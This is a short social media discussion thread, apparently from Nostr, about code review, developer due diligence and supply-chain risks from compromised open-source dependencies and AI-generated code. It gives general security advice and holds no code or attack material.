If you’re reviewing the code you’re merging, it’s quite simple to see where the security flaws are. Mostly, fine-combing all network calls will cover your buns. There’s additional nuances to look out for, but it’s not as worrisome as you might think with the proper due diligence. I’m sure nostr:nprofile1qqs9pk20ctv9srrg9vr354p03v0rrgsqkpggh2u45va77zz4mu5p6ccprpmhxue69uhhyetvv9ujuumfv9khxarj9e3k7mf0qythwumn8ghj7un9d3shjt3s0p3ksct59e3k7mf0rmlce2 has that under control!
Discussion
Exactly. I'm worried about a lack of due diligence.
Makes sense nostr:nprofile1qqs24wf73cl6d2yhfcwp7vveuheantah42nshq3kaya9kta0at7t6wspzfmhxue69uhhqatjwpkx2urpvuhx2ucpzamhxue69uhkxun9v968ytnwdaehgu3wwa5kuegxhdzxr . That is an existing problem, however, lack of dev due diligence; AI simply exacerbates it. I’m quite concerned about hacked open-source libraries and the propagation of malicious code through unattended external dependencies. Definitely a big security hole when mismanaged, and it’s incredibly easy to mismanage. Less concerned today about LLMs directly including malicious snippets, but… ya never know! Practice vigilance today, feel the joy tomorrow!